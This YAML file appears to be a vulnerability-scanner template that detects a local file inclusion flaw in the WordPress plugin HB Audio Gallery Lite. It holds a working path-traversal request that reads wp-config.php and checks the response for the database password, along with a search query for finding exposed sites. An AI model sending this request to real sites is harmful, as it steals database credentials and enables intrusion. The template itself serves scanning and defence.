id: hb-audio-lfi

info:
  name: Wordpress HB Audio Gallery Lite - Local File Inclusion
  author: dhiyaneshDK
  severity: high
  description: Wordpress HB Audio Gallery Lite is vulnerable to local file inclusion.
  reference:
    - https://packetstormsecurity.com/files/136340/WordPress-HB-Audio-Gallery-Lite-1.0.0-Arbitrary-File-Download.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
    google-query: inurl:/wp-content/plugins/hb-audio-gallery-lite
  tags: wp,packetstorm,wordpress,wp-plugin,lfi

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
        condition: and

      - type: status
        status:
          - 200

# digest: 490a0046304402202ed97766f3c22b4f6aeed2d6eedb9168525dc625bfaf0eeb47737dcd46b161f202200a44102ffbdee4c459884b0f80624bfdd376218ec46aa38bdb21b202ce19215b:922c64590222798bb761d5b6d8e72950
